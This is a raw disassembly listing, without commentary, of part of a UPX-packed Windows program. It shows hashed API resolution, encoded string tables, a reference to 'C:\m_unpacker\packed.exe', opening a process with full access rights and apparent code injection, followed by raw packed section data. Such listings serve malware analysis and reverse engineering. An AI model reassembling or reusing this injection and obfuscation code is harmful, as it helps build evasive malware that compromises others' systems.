loc_402B18: ; CODE XREF: sub_4029BA+88�j
; sub_4029BA+99�j ...
push edi
push 1
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call eax
push 0D89AD05h
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp dword_404104, 13h
mov esi, eax
jl short loc_402B4D
inc dword_404104
loc_402B4D: ; CODE XREF: sub_4029BA+18B�j
cmp dword_404104, 0A6h
jle short loc_402B63
mov dword_404104, 17h
loc_402B63: ; CODE XREF: sub_4029BA+19D�j
push 80DBBE07h
push 6
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
mov ebx, 723EB0D5h
jz loc_402C21
push 10h
push esi
push offset dword_4031F4
call sub_40102C
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push 0
call eax
test eax, eax
jz short loc_402C21
mov eax, dword_404104
add eax, 0FFFFFFBAh
cmp eax, 86h
ja short loc_402BCA
inc dword_404104
loc_402BCA: ; CODE XREF: sub_4029BA+208�j
mov eax, [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
push 6
mov [ebp+var_18], 1
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
xor ecx, ecx
push ecx
push ecx
push ecx
lea edx, [ebp+var_18]
push edx
push ecx
push edi
call eax
mov edi, [ebp+arg_4]
push ebx
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
cmp dword_404104, 3Fh
jge short loc_402C21
inc dword_404104
loc_402C21: ; CODE XREF: sub_4029BA+1CC�j
; sub_4029BA+1F9�j ...
cmp dword_404104, 12h
jl short loc_402C30
inc dword_404104
loc_402C30: ; CODE XREF: sub_4029BA+26E�j
cmp dword_404104, 0E6h
jle short loc_402C46
mov dword_404104, 18h
loc_402C46: ; CODE XREF: sub_4029BA+280�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403238
rep stosd
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014A6
mov esi, eax
test esi, esi
pop ecx
jz short loc_402CE1
cmp dword_404104, 47h
jge short loc_402C8A
inc dword_404104
loc_402C8A: ; CODE XREF: sub_4029BA+2C8�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402CE1
push 0
push esi
push offset sub_402819
call sub_40249D
mov eax, dword_404104
add eax, 0FFFFFFCBh
add esp, 0Ch
cmp eax, 9Eh
ja short loc_402CCD
inc dword_404104
loc_402CCD: ; CODE XREF: sub_4029BA+30B�j
push ebx
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_402CE1
; ---------------------------------------------------------------------------
loc_402CDC: ; CODE XREF: sub_4029BA+19�j
call sub_401C34
loc_402CE1: ; CODE XREF: sub_4029BA+2BF�j
; sub_4029BA+2EC�j ...
push 36h
pop eax
push 0FFFFFFF8h
pop ecx
loc_402CE7: ; CODE XREF: sub_4029BA+340�j
cmp ecx, 89h
ja short loc_402CF1
inc eax
inc ecx
loc_402CF1: ; CODE XREF: sub_4029BA+333�j
add eax, 11h
add ecx, 11h
cmp eax, 70h
jl short loc_402CE7
push 95902B19h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push 0
call eax
loc_402D13: ; CODE XREF: sub_4029BA+159�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_4029BA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402D20 proc near ; CODE XREF: sub_4014A6+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402D34: ; CODE XREF: sub_402D20+29�j
cmp ecx, eax
jb short loc_402D42
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402D42: ; CODE XREF: sub_402D20+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402D34
sub_402D20 endp
; ---------------------------------------------------------------------------
align 4
dd 0ADh dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_4014A6+2A3�r
; sub_401C34+10F�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_4014A6+1E7�r
; sub_4014A6+268�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_4014A6+164�r
; sub_4014A6+1B0�r
dword_40300C dd 77E74155h ; DATA XREF: sub_4014A6+2C1�r
; sub_4017DA+7A�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401C34+E7�r
; sub_401C34+640�r ...
dd 0
dword_40301C dd 0B899385Bh, 0F07353B8h, 0B8B8B9h ; DATA XREF: sub_401117+A4�o
dword_403028 dd 98B87B9Bh, 0B9F0F8D8h, 0B8B8h ; DATA XREF: sub_401117+95�o
dword_403034 dd 18F818DBh, 0F0BB99F8h, 0B8B8B9h ; DATA XREF: sub_401117+86�o
; sub_401C34+14�o
dword_403040 dd 3B195B3Bh, 0B8B9F018h, 0B8h ; DATA XREF: sub_401117+77�o
dword_40304C dd 19FBB919h, 7353183Bh, 0B8B8B9F0h, 0 ; DATA XREF: sub_401117+68�o
dword_40305C dd 5B7B99FBh, 0F0F8D818h, 0B8B8B9h ; DATA XREF: sub_401117+42�o
dword_403068 dd 0FAh ; DATA XREF: sub_4014A6+2AC�o
dword_40306C dd 3859FB5Bh, 0F0BB5BD8h, 993A99h ; DATA XREF: sub_4014A6+22C�o
dword_403078 dd 137B99FBh, 32h ; DATA XREF: sub_4017DA+65�o
dword_403080 dd 92B918F1h, 0 ; DATA XREF: sub_401C34+7A8�o
dword_403088 dd 0B9D859F1h, 927399h ; DATA XREF: sub_401C34+6D6�o
dword_403090 dd 9B91h ; DATA XREF: sub_401C34+62B�o
dword_403094 dd 0BB781BF8h, 0FB787A3Bh, 383BF0D8h, 0B919D23Bh, 0B91992FBh
; DATA XREF: sub_401C34+5E8�o
dd 9353D3FBh, 0B9D859F1h, 921399h
dword_4030B4 dd 38D898F9h, 0B8797B9Bh, 3AF8h ; DATA XREF: sub_401C34+541�o
dword_4030C0 dd 58F83899h, 0F01A9BBBh, 3B383Bh ; DATA XREF: sub_401C34+4D2�o
dword_4030CC dd 79FBD9B9h, 0DB181A3Bh, 3BF0983Bh, 3B38h ; DATA XREF: sub_401C34+466�o
dword_4030DC dd 0F998197Bh, 987A593Bh, 3BF0D95Bh, 3B38h ; DATA XREF: sub_401C34+3FA�o
dword_4030EC dd 0FB9B7998h, 383BF0F9h, 3Bh ; DATA XREF: sub_401C34+38E�o
dword_4030F8 dd 0FB59DBD9h, 0F018B85Bh, 3B383Bh ; DATA XREF: sub_401C34+322�o
dword_403104 dd 7AD9F858h, 3BF978h ; DATA XREF: sub_401C34+2C8�o
dword_40310C dd 7259h ; DATA XREF: sub_401C34+286�o
; sub_401C34+351�o ...
dword_403110 dd 0D9581AF9h, 0F07B7B9Bh, 0D23B383Bh, 92FBB919h, 0D3FBB919h
; DATA XREF: sub_401C34+254�o
dd 9353h
dword_403128 dd 0BE7259h ; DATA XREF: sub_401C34+21D�o
; sub_401C34+58C�o
dword_40312C dd 3BBBBB38h, 1AD0D072h, 1B1A1AD9h, 1A991BBBh, 5838F03Bh
; DATA XREF: sub_401C34+203�o
dd 0D87B3BD0h, 0D8D05BD9h, 1B38791Ah, 0D018h
dword_403150 dd 3BBBBB38h, 7AD0D072h, 0D93AF8D9h, 1B78F999h, 0D859F078h
; DATA XREF: sub_401C34+1F9�o
dd 7B3BD098h, 0D05BD9D8h, 38791AD8h, 0D0181Bh
dword_403174 dd 1B183BBEh, 3A99F05Bh, 99h ; DATA XREF: sub_401C34+1A7�o
dword_403180 dd 7B78BBBEh, 3A99F03Ah, 99h ; DATA XREF: sub_401C34+18D�o
dword_40318C dd 0F85998BEh, 0F0B8797Bh, 993A99h ; DATA XREF: sub_401C34+173�o
dword_403198 dd 791AF8BEh, 99F0F8B8h, 993Ah ; DATA XREF: sub_401C34+159�o
dword_4031A4 dd 0D91B18BEh, 0FBF99B19h, 993A99F0h, 0 ; DATA XREF: sub_401C34+13F�o
dword_4031B4 dd 791999BEh, 19F8F8BBh, 993A99F0h, 0 ; DATA XREF: sub_401C34+125�o
dword_4031C4 dd 38FB98BEh, 0F01B19F9h, 993A99h ; DATA XREF: sub_401C34+105�o
dword_4031D0 dd 0B991h ; DATA XREF: sub_401C34+D5�o
dword_4031D4 dd 0BE725Dh ; DATA XREF: sub_401C34+AC�o
dword_4031D8 dd 0F87B9958h, 7353B899h, 0B8B8B9F0h, 0 ; DATA XREF: sub_401C34+4F�o
dword_4031E8 dd 7B995B9Bh, 0B9F07353h, 0B8B8h ; DATA XREF: sub_401C34+34�o
dword_4031F4 dd 99BD995Fh, 3FD99B79h, 18FB187Bh, 99D999B8h, 0
; DATA XREF: sub_4029BA+1D5�o
dword_403208 dd 0B8B9BBF8h, 0B8B9F0B8h, 0B8h ; DATA XREF: sub_40249D+101�o
dword_403214 dd 199CBBFCh, 9918FF3Bh, 5FF9DCDBh, 18BB5999h, 0F8D8h
; DATA XREF: sub_40249D+E6�o
dword_403228 dd 59FB5BBEh, 0BB5BD838h, 993A99F0h, 0 ; DATA XREF: sub_402819+9B�o
dword_403238 dd 0B83B3A99h, 7B997BD8h, 993A99F0h, 36Fh dup(0) ; DATA XREF: sub_4029BA+CA�o
; sub_4029BA+297�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402445+F�o
; sub_4029BA+169�o
align 4
dd 3Ah dup(0)
dword_404104 dd 93h ; DATA XREF: sub_401117+4�r
; sub_401117+10�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+3C�o
; sub_401117+62�o ...
byte_404208 db 1 ; DATA XREF: sub_40130A+34�r
; sub_40130A+74�w
byte_404209 db 1 ; DATA XREF: sub_40130A+26�r
; sub_40130A+42�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_402819+116�o
; sub_402819+136�r
dword_404210 dd 0 ; DATA XREF: sub_402819+130�r
; sub_402819+14D�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 21F00000h, 62B0C01h, 6090620h, 6090609h, 15310609h
dd 5F1B3B11h, 6360E26h, 62B0F07h, 0F0C0608h, 4E103010h
dd 464E093Eh, 10171609h, 0C060961h, 0E294C29h, 0C06091Dh
dd 28133D0Ch, 9491608h, 161B0C06h, 616063Ch, 430C060Ch
dd 550C060Ch, 650C0608h, 10700C5Ch, 0C2A0C56h, 675247Bh
dd 10181B20h, 2908121Bh, 80C0913h, 1A1A150Bh, 441A1A1Ah
dd 371A0A0Eh, 2F5A4232h, 323A323Dh, 353A323Ah, 9354B3Ah
dd 2B0C0C06h, 25160810h, 1D0C0609h, 19102B38h, 392E153Bh
dd 1E652C13h, 0C060929h, 6070952h, 28590813h, 1116110Fh
dd 0C44441Ch, 0D4C0D3Fh, 102F0C06h, 6381555h, 110C0616h
dd 61B1230h, 0A161205h, 7D630C06h, 916150Bh, 28130A26h
dd 0C060B1Ah, 10261322h, 906094Eh, 15140C06h, 0A260916h
dd 50003B13h, 4C000045h, 0C8000401h, 463A45h, 0
dd 0E0000000h, 0B010200h, 801h, 1Eh, 0Ch, 0BA000000h, 29h
dd 10h, 30h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 40000h, 1000h, 10h, 1000h, 10h, 10000000h
dd 2 dup(0)
dd 48000000h, 3C000032h, 7 dup(0)
dd 0EC000050h, 1, 0Ch dup(0)
dd 1C000030h, 6 dup(0)
dd 2E000000h, 74786574h, 4B000000h, 1Dh, 10h, 1Eh, 4, 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 0F6000061h, 2, 30h
dd 4, 22h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 1C000000h, 2, 40h
dd 4 dup(0)
dd 40000000h, 2EC00000h, 6F6C6572h, 3A000063h, 2, 50h
dd 4, 26h, 2 dup(0)
dd 40000000h, 420000h, 0A0000050h, 4A000032h, 50h, 513Bh
dd 6F5D7CE3h, 0C23E9CD8h, 98183331h, 0C03EA151h, 37C33DE0h
dd 94F60E96h, 86565330h, 8B846h, 8D9BFB05h, 0BFB39357h
dd 99A4299Dh, 0B0755657h, 2B28D1DFh, 0D88B6B22h, 3F74DB85h
dd 1FB0F3Fh, 0B03DDA79h, 0C9438568h, 4D8D2EFDh, 0E6FEC3BBh
dd 7D5351FCh, 0A84268FCh, 57169E6Fh, 0CB5CEB13h, 6AC2CD24h
dd 0A4311255h, 0D97B2C2Ch, 833DC279h, 76A356F7h, 0BB77006Ah
dd 4599B583h, 0FF6A167Dh, 0B1D56848h, 0B0EC37C3h, 5859723Eh
dd 0B6F6A403h, 74A43646h, 5B312363h, 11E11FF6h, 1318B802h
dd 6A1C1D50h, 0C983582Eh, 0F19A8CFFh, 2298C932h, 0E8BA3D22h
dd 0DF856075h, 93E86897h, 948D7743h, 0B99AEFBBh, 8753B3F0h
dd 899EFCE8h, 8AC4909Bh, 5AC9D2DAh, 51F4FBAAh, 5C22104Dh
dd 21E84468h, 52F8A9ECh, 31FD0291h, 669CACE4h, 0F445F7C0h
dd 0DEEA71DDh, 860FFF45h, 89BF1F71h, 85B48B80h, 0FB66083Ch
dd 36F68539h, 3DD66E48h, 87C830CCh, 16A9E81h, 5752ED56h
dd 10684236h, 0F8B8538Ch, 4EDB3F8Dh, 56FE9702h, 0F8755450h
dd 0B6B5EA4Ah, 68BEC06Dh, 189F16C9h, 4BFECA9h, 0C871F005h
dd 20A3D6B3h, 0E01C5A6h, 85C90A5Fh, 0F046ED49h, 0B1219168h
dd 0FBD921E6h, 0FE104CE4h, 0F7CD4B56h, 358BD759h, 5087084Fh
dd 6A5AD6FFh, 0EC669680h, 10E9BDDDh, 5D850F3Ah, 505CEA0Ch
dd 664FFBF8h, 0EBF08B2Ah, 0BC804E01h, 755C0E35h, 0EDF1B8F5h
dd 15FF01EDh, 4A7E424Bh, 0F739496Ah, 265E4559h, 2386AC59h
dd 1B9C3D23h, 29C11EFBh, 35848DA5h, 4365064h, 86915D79h
dd 0AFF085B7h, 77B8456h, 0B390BA48h, 0D908E3D1h, 0B03C9FCAh
dd 78571B40h, 94F7076Ch, 0E430BB30h, 35076A8Ah, 66F151E8h
dd 0E09D7BA6h, 0FCC43E85h, 0EC8F0DCBh, 737480C9h, 60749357h
dd 0CDF2FFE6h, 35126EEh, 3A33599Fh, 6461E6FDh, 68017F1Bh
dd 0C64B28C6h, 1D57B03Fh, 0E9ED680Ch, 8B0120E4h, 9CCB18B2h
dd 1DF9921Ah, 426340C0h, 390C6B93h, 895DBDC1h, 0F053902h
dd 52E9482h, 90199209h, 3326E20Bh, 6BF1DAC1h, 0F7087CCFh
dd 696EDB33h, 89EDFC19h, 0EC02FC5Dh, 0D0E045C7h, 0CB30D407h
dd 4E41AE8Dh, 848156ADh, 2F0853F7h, 816827F0h, 740534D4h
dd 3DE87589h, 5BD78D18h, 0F9432622h, 0B1901C92h, 0F78478ECh
dd 0CE5842E4h, 0B2E40173h, 7FDA30C1h, 5F042106h, 593DD768h
dd 3F83954Bh, 6800DCCCh, 7DBD6613h, 11FB58B8h, 1C0642B0h
dd 1BF4755Fh, 59D330B9h, 603C0F60h, 9BEC3ADBh, 78681501h
dd 5D1AD09Ch, 6C580357h, 2E04159h, 8B061840h, 5211C8Dh
dd 0FE6E6039h, 0D50B9019h, 5CE02727h, 6181572Fh, 89671A05h
dd 3F5CB54Ah, 0BAD3DD08h, 0D9202568h, 0FF888DECh, 0DBD369FBh
dd 0DEC7FFAEh, 870F258Fh, 186A5123h, 6D272F2Ch, 0B559C770h
dd 2727297Fh, 0BEEB23Dh, 68EC3FEBh, 8F8F114h, 806853D3h
dd 0B42B651Ah, 84CC9F02h, 1A704055h, 560C9616h, 0FBC7F00Ch
dd 0C13ED084h, 2962CAECh, 27C9CC21h, 8CB42DEBh, 45258DEDh
dd 0C9FEC095h, 0F8ED1673h, 3A64EB6Ch, 976574C3h, 0F53BED6Dh
dd 3FD1C368h, 0DC5B7C0Fh, 730DD8CFh, 0DC3A7593h, 777AF044h
dd 85BD9136h, 39778574h, 41E40D20h, 2F9777E0h, 0E6DB3DE4h
dd 0F242EDBh, 2413EB64h, 3FE3DFEh, 0FDD66C16h, 105D8809h
dd 28A104EBh, 0C364266Bh, 0D415D9CEh, 0C861DAE1h, 0CE95206h
dd 70E914FBh, 67206111h, 0A935F465h, 84A50B8Bh, 872A8630h
dd 8FC3C801h, 0F168803Ch, 31AEF7CBh, 5984B6F0h, 48D1BE6Ch
dd 40B02CD4h, 3592E169h, 6593EE25h, 0FBAFD384h, 67121414h
dd 8BE9C6F1h, 0DC4D3B38h, 0BFEE0F71h, 0E4FDAB6Bh, 38097D05h
dd 0B8C6BEFBh, 81DD508Dh, 8138B1FAh, 36F24885h, 0F1414C40h
dd 2141A1AEh, 29510A04h, 0C1814974h, 97FC2ADDh, 6A3B7769h
dd 88458D40h, 448406A7h, 0C13F4658h, 8AC7AE38h, 0B9A24631h
dd 0AED9A958h, 0E884C8h, 51BEB0D1h, 984CF133h, 0FFC88303h
dd 2D460759h, 3B03B8F3h, 184A34EEh, 57BF233Dh, 0F91643EFh
dd 211FC035h, 0C10C1AE8h, 0D8232008h, 0FD68614h, 903DA5E4h
dd 7A813811h, 66444D0h, 0D85DC861h, 430AE1A3h, 0C0F92C30h
dd 9695A95Dh, 5CC60CFDh, 0DE970DD4h, 196067ECh, 0D9F6CCFBh
dd 285D8E3h, 0EB3BD028h, 0D8EF16C2h, 0C656B820h, 16B2A14h
dd 2186339h, 0BA2FF589h, 0C4191C0Eh, 0FFF93D8Bh, 0F60C8B56h
dd 0D7FE485Ch, 1919B4D5h, 58390990h, 406468A4h, 980A0646h
dd 19019078h, 888C0B19h, 64640642h, 0E0988009h, 7464064Fh
dd 7D8166A8h, 89EC19DCh, 84365E13h, 90FC0631h, 0B0C240Ah
dd 3F83777h, 7E88406h, 0A2040953h, 38E06159h, 8BC08FF6h
dd 0E07DC91Dh, 6A0A7500h, 0EB505123h, 0DB1901C9h, 2C7522FBh
dd 1C88FC48h, 1903D8C8h, 0C16EFD28h, 50516B0Eh, 362FD30Ch
dd 4059FEB8h, 10164E46h, 0AF65BB19h, 34ABD3D0h, 0D607212Bh
dd 3041B0D9h, 25310CB0h, 0D8285C26h, 7556DE56h, 1900715Ah
dd 773C819h, 0B074B04h, 0E9850164h, 9173E411h, 591D34B9h
dd 8F8200Bh, 0CA08586Eh, 648B365Eh, 6B18325Bh, 9021B588h
dd 1EC0991h, 601C9163h, 986B6EE7h, 7232005Ch, 1768DC0Eh
dd 0CC801C80h, 1C60578h, 9C0AF08h, 6CAE40E4h, 21A80C6Eh
dd 0A8B9190h, 0C9706DB4h, 246B03B5h, 27127FA3h, 0B87692E0h
dd 0F028937h, 894F6C8Ch, 0C86E2914h, 43214604h, 1F6325C9h
dd 1FD11E0Ch, 583894A6h, 0E2687F46h, 0C5270118h, 3C80862Bh
dd 3DD5AB09h, 5E023BFh, 200E7762h, 9A435790h, 3750D045h
dd 58590EDCh, 40A8AF8h, 7D80A81Dh, 0D6B7B6F9h, 458800FFh
dd 0C60675EDh, 5C30EF45h, 1304F916h, 0E406EF0Fh, 4A4CE42h
dd 66921CB9h, 5C6176B2h, 0A791FCD2h, 4FCF919h, 0EEECFD17h
dd 0E5B610DAh, 0EE1904FDh, 180EEC29h, 0AD0D6321h, 0ED077A6Bh
dd 216C0B88h, 0FFE8C143h, 66DAEDB6h, 848A0B8Bh, 6DE578E4h
dd 37430E6h, 0CBE66588h, 6AFC4B24h, 58C93325h, 0ACEF141h
dd 0BD086C0Ah, 4A973DC8h, 0CB2DBEAh, 0FC4FADD2h, 73C8E4E7h
dd 0D1E436C9h, 2404E8E4h, 80C958F0h, 0ED80601Bh, 0A2DF5B06h
dd 0E28D3D36h, 897E1304h, 2B196877h, 0E0D9590h, 9E96DF89h
dd 0F0DFBFADh, 0BEBE81F0h, 0DFF9254Dh, 0EB00302Bh, 812C6832h
dd 0F8AF1297h, 0FF64F04Dh, 68267402h, 3D9972F5h, 3E86814h
dd 87E25700h, 0B0150492h, 4D5FC574h, 6DDDA2C6h, 6811C25Eh
dd 0BF19CC10h, 250F20FBh, 488BFF2Dh, 0FC8033Ch, 0BF42B5DDh
dd 18413C09h, 8938708Bh, 87E70B24h, 75701BC5h, 8C2B7DE4h
dd 0D4A08B63h, 2A46C160h, 520986FFh, 7ADFFC67h, 1BDFF7F8h
dd 3CE783FFh, 6504C783h, 33FBD110h, 16AF1720h, 0EF0A25B7h
dd 5337A1F4h, 7453562Fh, 0C33BD086h, 0A6FECBDFh, 320775B8h
dd 681018F7h, 5CD9430h, 0BECE2524h, 0F064006Ah, 266DEC25h
dd 7D82C38Bh, 12443A4Ch, 849C25E0h, 0A614223Ah, 0BB20BC45h
dd 94B3062h, 9C082244h, 685FDB8Ch, 1FC0EAEEh, 9AF08B11h
dd 4BA351BCh, 19CA5F6Ch, 0F4BAE9E4h, 0ABB6175Ah, 0A6B96291h
dd 0C2834642h, 942BA202h, 2B6FF9E2h, 1701BC1Dh, 99157B8h
dd 82FDA8D8h, 0E32182D8h, 0BBB0E038h, 0DF831D8h, 8BEA5175h
dd 0FF8396B1h, 0FC57E476h, 47077C0Dh, 0FF2C3D89h, 105F18C1h
dd 63637ED9h
dd 48A3DC8Fh, 0E84D0314h, 90D40B26h, 1AB60193h, 0BC286FBDh
dd 2BC68B4Eh, 478DA4ADh, 9DD53DE3h, 87ED12FFh, 34418B2Ch
dd 38BB1903h, 975BE8Dh, 6FF77881h, 8B06F1B4h, 3060907h
dd 408BED71h, 0C410302h, 7FFBAD1Bh, 900DEB63h, 4001EB08h
dd 75183966h, 54040FAh, 0FB5B61EFh, 43ABBA49h, 8B0C497Dh
dd 0D725EC55h, 0FFFB7F54h, 8AFC11FFh, 0CB3A4008h, 0F9803074h
dd 0F0773F0h, 0D103C9B6h, 30A30FEBh, 0C10FE183h, 6DBB1DE1h
dd 0CE0B10EDh, 0AE8B410Eh, 75260A01h, 0F64C2FD9h, 0FFEA9AECh
dd 72B4F19h, 2E087503h, 3A56FFE3h, 75FE8B10h, 74B36841h
dd 5303E618h, 65349212h, 3B860CD3h, 824304E8h, 7DA96CE7h
dd 9FF15B75h, 686D4B00h, 0AA1DE02Fh, 25F01C6Ah, 8B035A2Bh
dd 3F1C2A02h, 10CAF95Bh, 0C82310ABh, 0E7A0BD89h, 0FD95802Ch
dd 0CF0C581Fh, 0B1185C80h, 0B26714D0h, 95E012E0h, 0EC3A77CDh
dd 0C9E4065Dh, 0CFC6F09Ah, 4D8AA53Dh, 5CD05931h, 57364C3Eh
dd 4C9F21E7h, 5343B5F6h, 0D92607D0h, 3C6AD5BAh, 0C259F6B4h
dd 6FF51B84h, 3D1B5E44h, 9AF0BA8Eh, 0FF336FB8h, 24900D53h
dd 9F0AC788h, 0DB583057h, 45143605h, 8A539506h, 3C81FD93h
dd 0A1374A68h, 1046949h, 6CE892E0h, 34FEB494h, 0DE0B3122h
dd 741EF3C0h, 1CEC6F23h, 4FED3C4h, 35894686h, 0D9ABF3FEh
dd 5E25F693h, 57BCFE10h, 493D7CC0h, 0B7468DB8h, 0AC3082EAh
dd 66AEB6DDh, 0D105E81Ah, 0C940B640h, 0B0901B0Eh, 6D82C30Ch
dd 60B8CC05h, 0B9B5703h, 0C9EBB630h, 10322CFFh, 0C0C0C05h
dd 36E536C7h, 51569914h, 681C8B16h, 91E0C23Bh, 7B88BFF1h
dd 5E042753h, 87EC37E3h, 6068B6E4h, 35768AA2h, 82810F68h
dd 1C9E1B01h, 2905013Ch, 9D863B73h, 85C1C0C4h, 36C6C0Dh
dd 9D246A32h, 5AD59E3h, 0A960B212h, 26047983h, 0BFA0682Ch
dd 0BE4D5720h, 1C12BD03h, 21473869h, 8340DF76h, 8D14889Eh
dd 11C50D94h, 1BEE7A80h, 2D8297Fh, 3B41DA8Bh, 0B8B4BC8h
dd 0FD0020B8h, 0BDBEAD1h, 78655CC8h, 7D3C6C70h, 0FC044B8Bh
dd 10FE5919h, 7265726Fh, 652E08BFh, 0B6646578h, 0CEAEB14Fh
dd 9D09480Ch, 5C136B70h, 72CACA45h, 0C82C87Dh, 38CFFC08h
dd 0C802ABF3h, 0F5623637h, 85218C09h, 2563746Ah, 3109E810h
dd 34517D47h, 0B6BEE7E8h, 1F0FFF68h, 36742DBBh, 4460C386h
dd 19188836h, 65E7CBEBh, 9EC16118h, 1839464h, 1DC60F83h
dd 0CE68920Fh, 0D07E0564h, 38AD0534h, 3B456117h, 6D13BF84h
dd 17FD2493h, 768A632h, 6A80DBBEh, 88460006h, 5F0CC2C1h
dd 0BB02E720h, 0F0B0F03Eh, 1795B280h, 0F421F010h, 4FD8209Fh
dd 1B3D12B9h, 51F89235h, 7091B07Bh, 0CC6C1EE0h, 0C9863DBAh
dd 1176AE8h, 457D8B65h, 0F68E6EECh, 67DCB186h, 0C83C7A21h
dd 24E11B3Eh, 0A60E6E8Bh, 9002F409h, 2DBE3DC0h, 8D0051DBh
dd 0B852E855h, 96139034h, 635F11E1h, 6321323Fh, 0E6125AD0h
dd 16110850h, 0C804CCD1h, 3966C841h, 0B2D5320Eh, 32E664C7h
dd 0CF4B349h, 7366A30h, 481189F8h, 11CB28B3h, 0C406CC70h
dd 614875FEh, 0CC2FEh, 0FF8B00CCh, 4C262E0Dh, 1BC80924h
dd 23D0F7C0h, 80C48BC8h, 654BFD6Ah, 0A7204F0h, 9459C18Bh
dd 0E8B42D8Bh, 2D2AADA2h, 0FEF8538h, 367EC282h, 5B00004Bh
dd 0DFEC7D38h, 0B8B899FEh, 0B9F07353h, 7B9B0005h, 0F8D898B8h
dd 18DB000Ah, 1FB3F7F8h, 0BB9901BBh, 195B3B0Ch, 16183Bh
dd 0CFBB919h, 305DF60Dh, 99FB0030h, 34185B7Bh, 0B7BF77FAh
dd 0FB5B0FDFh, 5BD83859h, 993A9937h, 1332131Bh, 0FFB918F1h
dd 92BFF6EDh, 0D859F12Bh, 0A7399B9h, 0F80B9B91h, 3BBB781Bh
dd 32FB787Ah, 0D8FDD776h, 3B383BF0h, 39255D2h, 239353D3h
dd 6FB7FB13h, 3889F9DBh, 0F8B8798Fh, 38992B3Ah, 9BBB58F8h
dd 1FFE291Ah, 0B900FFFBh, 3B79FBD9h, 3BDB181Ah, 7B000E98h
dd 3BF99819h, 5B987A59h, 0ECFFD8D9h, 79980FCFh, 0AF9FB9Bh
dd 59DBD900h, 18B85BFBh, 0B7DBCB0Dh, 0D9F858F6h, 5900296Dh
dd 1A5B0072h, 767BD958h, 79643701h, 38AD1B00h, 0A97F96BBh
dd 0D072FFFFh, 1AD91AD0h, 1BBB1B1Ah, 0F03B1A99h, 7BDF5838h
dd 0D05BD9D8h, 9983B7D8h, 38791AF8h, 2308181Bh, 0D99CD97Ah
dd 6D90C299h, 0C978F9DBh, 2498B4F0h, 7C8724BEh, 5B1BE11Bh
dd 0BB0B0005h, 983A7B78h, 0DCC7B99Dh, 0DD6F859h, 0E01AF8BEh
dd 0EFE4BE18h, 0D92EBF66h, 0FBF99B19h, 19990F0Dh, 0F8F8BB79h
dd 0F23B6619h, 38FB37DFh, 911B19F9h, 7B5DABB9h, 58850B09h
dd 8BB8A25Fh, 0FE105B9Bh, 0D587E17h, 99BD995Fh, 7B3FD90Ah
dd 0B818FB18h, 41E5D999h, 0F843C770h, 0FCC71ABBh, 67049CBBh
dd 18FFFDB8h, 0F9DCDB99h, 0C2BB592Ah, 0F6BDBC63h, 6000DCDh
dd 7BD8B83Bh, 6120F53h, 0FFF36141h, 0AA8C8040h, 544D9111h
dd 0BFF20900h, 2058573Ch, 74736C01h, 79706372h, 0B3E43E41h
dd 69706D0Fh, 656C1441h, 4174616Eh, 0D9A7FF73h, 77146531h
dd 69727073h, 1366746Eh, 0E41FFF01h, 121F0FFh, 20062B0Ch
dd 15310906h, 5F1B3B11h, 6360E26h, 0FDBF0F07h, 8176FFFh
dd 100F0C06h, 3E4E1030h, 9464E09h, 61101716h, 4C290C20h
dd 0BED60E29h, 71DBBFBh, 28133D0Ch, 9491608h, 63C161Bh
dd 0B7010616h, 43DD77FFh, 65335503h, 10700C5Ch, 0C2A0C56h
dd 5B75247Bh, 0FFFB181Bh, 1B10FFF7h, 13290812h, 0B080C09h
dd 44001A15h, 371A0A0Eh, 2F5A4232h, 13A323Dh, 0FDFB66DBh
